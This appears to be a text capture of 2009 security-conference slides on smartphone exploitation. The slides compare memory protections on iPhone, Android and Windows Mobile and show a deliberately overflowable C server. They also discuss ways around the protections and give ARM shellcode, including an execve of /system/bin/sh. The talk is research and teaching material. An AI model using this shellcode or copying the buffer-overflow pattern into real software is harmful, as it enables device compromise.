- 'smartphone (in)security' - cansecwest · "smartphone (in)security" nicolas...
TRANSCRIPT
![Page 1: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/1.jpg)
Smartphone (in) Security
”Smartphone (in)security”
Nicolas Economou andAlfredo Ortega
March 18, 2009
![Page 2: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/2.jpg)
In this talk:
1. Introduction
2. Smartphone Security overview
3. Exploitation and shellcodes for both platforms
4. Demonstration
5. Real vulnerabilities reported
![Page 3: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/3.jpg)
Introduction
What is a smartphone?
1. No clear definition.
Figure: Not a smartphone!
2. Common cellphone with advanced features and complete OS
3. Big players: Nokia (Symbian), Apple (iPhone) and RIM(Blackberry)
4. Google Android: The newcomer
![Page 4: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/4.jpg)
Introduction
What is a smartphone?
1. No clear definition.
Figure: Not a smartphone!
2. Common cellphone with advanced features and complete OS
3. Big players: Nokia (Symbian), Apple (iPhone) and RIM(Blackberry)
4. Google Android: The newcomer
![Page 5: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/5.jpg)
Introduction
What is a smartphone?
1. No clear definition.
Figure: Not a smartphone!
2. Common cellphone with advanced features and complete OS
3. Big players: Nokia (Symbian), Apple (iPhone) and RIM(Blackberry)
4. Google Android: The newcomer
![Page 6: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/6.jpg)
Android and Iphone
Figure: Unix and Webkit based: High compatibility
1. IPhone 2.2.1: ARMv6 CPU, Mac OS-X (Darwin 9.4.1)
2. Android R1.1: ARMv5 CPU, Linux 2.6.25
3. Windows Mobile 6.1: ARMv5 CPU, Windows CE 5.2.x
![Page 7: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/7.jpg)
Why attack smartphones?
1. Personal data and Identity thief
2. High speed and permanent connection (3G)
3. Small variability (few security updates)
4. High bug-count (few audits, small time-to-market)
5. Terrorist target
Figure: Exploit writer (Terrorist)
![Page 8: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/8.jpg)
Why attack smartphones?
1. Personal data and Identity thief
2. High speed and permanent connection (3G)
3. Small variability (few security updates)
4. High bug-count (few audits, small time-to-market)
5. Terrorist target
Figure: Exploit writer (Terrorist)
![Page 9: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/9.jpg)
Protections (Simplified diagram)
ANDROID
IPHONE
Data (.DATA) Libs
0x00008000 0xAFB00000Contiguous
Stack
RANDOM
Code (.TEXT) Data (.DATA) Heap
0x00001000Contiguous 0x30000000
Stack NX
Code (.TEXT) Heap
LibsNX
Figure: Memory Maps
![Page 10: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/10.jpg)
Protections (Windows Mobile)
DLLs (and shared heaps)
Slot 2
Slot 1
Slot 0
Slot 30
Slot 31
Slot 59
Slot 63
(Memory mapped files)
Slot 32
00000000
02000000
04000000
08000000
3E000000
3F000000
40000000
42000000
Process 1
DLLs
Act. Process
Process 30
Process 31
Process 32
76000000
80000000
Figure: Memory Map - Windows Mobile 6.1
![Page 11: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/11.jpg)
Protections (comparision)
Table: Exploit mitigation techiques
Protection Android W. Mobile Iphone
Stack NX - - YesHeap NX - - Yes
Cookie - Yes, 16 bit -Random Libs - - -
Random Stack Yes - -SEH - stack -
![Page 12: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/12.jpg)
Example bug
i n t main ( i n t a r g c , char ∗ a r g v [ ] ){
char b u f f e r [ 64 ] ;unsigned i n t l e n = 0 ;
. . ./∗ A c c e p t i n g c o n n e c t i o n ∗/
c l i e n t = a c c e p t c o n n e c t i o n ( sock ) ;
/∗ Read h e a d e r ∗/r e a d s o c k e t ( c l i e n t , ( char ∗ ) &l e n , 4 ) ;
/∗ Read data ∗/r e a d s o c k e t ( c l i e n t , b u f f e r , l e n ) ;
![Page 13: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/13.jpg)
Tools and versions
Iphone:MAC-OSX, Darwin 9.4.1, gcc 4.0.1
Debugger: iphonedbg 1.02b(http://oss.coresecurity.com/projects/iphonedbg.html)
Android: android-sdk-linux x86-1.1r1 - Codesourcery arm-2008q1-126Debugger: GNU gdb (http://ortegaalfredo.googlepages.com/android)
Windows mobile 6.1:Visual Studio 2005, Debugger: GNU gdb for wince
![Page 14: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/14.jpg)
IPhone-tunnel
1. Opens a tcp tunnel from PC to iphone via the USB cable
2. Inspired by iphuc
3. Needs iTunes installed (uses certain services from it)
4. Download from:http://oss.coresecurity.com/repo/iphone tunnel-v1.01+.zip
![Page 15: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/15.jpg)
IPhone-tunnel
NET
WEB
IPhone
ITunes
Apple mobile serviceIPhone_tunnel.exe
TCP
TCP
Local
PC
USB
USBIphone 3G
Figure: Tunnel internal working model
![Page 16: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/16.jpg)
IPhonedbg
1. Application for iphone process debugging
2. Was created using ”weasel” as a guide
3. Interface based on Windows ntsd.exe debugger.
4. Download from:http://oss.coresecurity.com/repo/iphonedbg-v1.01.zip
5. Nowadays, a full-featured native GDB is available for iphone.
![Page 17: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/17.jpg)
Exploiting the Iphone
1. With all those protections, is it possible to bypass theprotections on the Iphone?
2. mprotect(0x2ffff000,0x1000, READ WRITE EXEC)?
3. mprotect(0x2ffff000,0x1000, READ EXEC);jmp stack;
![Page 18: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/18.jpg)
Exploiting the Iphone
1. With all those protections, is it possible to bypass theprotections on the Iphone?
2. mprotect(0x2ffff000,0x1000, READ WRITE EXEC)?
3. mprotect(0x2ffff000,0x1000, READ EXEC);jmp stack;
![Page 19: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/19.jpg)
Exploiting the Iphone
1. With all those protections, is it possible to bypass theprotections on the Iphone?
2. mprotect(0x2ffff000,0x1000, READ WRITE EXEC)?
3. mprotect(0x2ffff000,0x1000, READ EXEC);jmp stack;
![Page 20: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/20.jpg)
Exploiting the Iphone
Figure: Iphone exploitation
![Page 21: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/21.jpg)
Exploitation
Overflow
Stack
Heap
Android exploiting
Jmp sp
Random!
0xBF000000
0x40000000
Figure: Android exploitation
![Page 22: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/22.jpg)
Binary compatibility
R0
R0
int execve(cont char *filename, char *const argv[], char *const envp[]);
R3R2R1 R7 R12
#11 #59
R3R2R1 R7 R12
ssize_t write(int fd, const void *buf, size_t count);
#4 #4
Figure: Syscalls examples
![Page 23: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/23.jpg)
Shellcode Android/Iphone
char s h e l l c o d e [ ]=// s y s w r i t e ( . . . )”\x0 f\x80\xa0\xe1 ” // mov r8 , pc”\x04\x70\xa0\xe3 ” // mov r7 ,#4 ( s y s c a l l #)”\x00\x00\xa0\xe3 ” // mov r0 ,#0 // s tdou t”\x08\x10\xa0\xe1 ” // mov r1 , r8 r1−>pc”\x2C\x10\x81\xe2 ” // add r1 , r1 , #0x2C”\x0e\x20\xa0\xe3 ” // mov r2 , 0 x10 ( s i z e )”\x07\xC0\xa0\xe1 ” // mov r12 , r7 //compat iphone”\x80\x00\x00\ x e f ” // svc 0 x00000080
// s y s e x i t ( 1 )”\x01\x00\xa0\xe3 ” // mov r0 ,#1”\x01\x70\xa0\xe3 ” // mov r7 ,#1 ( s y s c a l l #)”\x08\x80\xa0\xe1 ” // NOP (mov r8 , r8 )”\x07\xC0\xa0\xe1 ” // mov r12 , r7 //compat iphone”\x80\x00\x00\ x e f ” // svc 0 x00000080” h i eve rybody !\n\x00” ;
![Page 24: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/24.jpg)
Shellcode Android/Iphone THUMB
char she l lcodeThumb [ ] =// w r i t e ( )
”\x46\x f 8 ” //mov r8 , pc ( Get EIP )”\x20\x02” //mov r0 ,#2 ( s t d e r r )”\x27\x04” // mov r7 ,#4 ( s y s c a l l w r i t e )”\x46\x41” // mov r1 , r8 ( s t r i n g )”\x31\x14” // add r1 ,#0x14”\x22\x10” // mov r2 ,#0x10 ( s i z e )”\x46\xbc” // mov r12 , r7 ( compat iphone )”\xd f\x80” // svc #0x80
// e x i t (1 )”\x21\x01” // mov r1 ,#1”\x27\x01” // mov r7 ,#1 ( s y s e x i t )”\x46\xbc” // mov r12 , r7 ( compat iphone )”\xd f\x80” // svc #0x80
” h i eve rybody !\n\x00” ;
(No nulls!)
![Page 25: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/25.jpg)
Shellcode Android/Iphone ExecVE
s t a r t :b c o d e s t a r t
a rg0 : . a s c i i ”/ system/ b in / sh\x00”arg1 : . a s c i i ”−c\x00”arg2 : . a s c i i ”/ system/ b in / s e r v i c e\x00”env : . a s c i i ”\x00\x00\x00\x00\x00\x00”c o d e s t a r t :
mov r8 , pcsub r0 , r8 ,#100 @arg0sub r1 , r8 ,#85 @arg1sub r2 , r8 ,#82 @arg2sub r3 , r8 ,#30 @envsub r4 , r8 ,#24 @array0s t r r0 , [ r4 ]add r4 , r4 ,#4 @array1s t r r1 , [ r4 ]add r4 , r4 ,#4 @array2s t r r2 , [ r4 ]sub r1 , r8 ,#24 @array0sub r2 , r8 ,#30 @envmov r7 ,#11 @ s y s c a l l #mov r12 ,#59 @compat iphonesvc #0x01010101
![Page 26: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/26.jpg)
Demo!
Figure: Demo-time!
![Page 27: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/27.jpg)
Real thing:
1. CORE-2008-0124: Multiple vulnerabilities in Google’s AndroidSDK : Browser exploit for the BMP format.
2. CORE-2008-0603: iPhone Safari JavaScript alert Denial ofService: Webcore process denial of service.
3. Many others (Not discovered by us!)
![Page 28: - 'Smartphone (in)security' - CanSecWest · "Smartphone (in)security" Nicolas Economou and Alfredo Ortega ... 4.Google Android: The newcomer. ... GNU gdb (http](https://reader031.vdocuments.us/reader031/viewer/2022022506/5ac1c5b97f8b9a433f8d41c3/html5/thumbnails/28.jpg)
Final questions?
The end!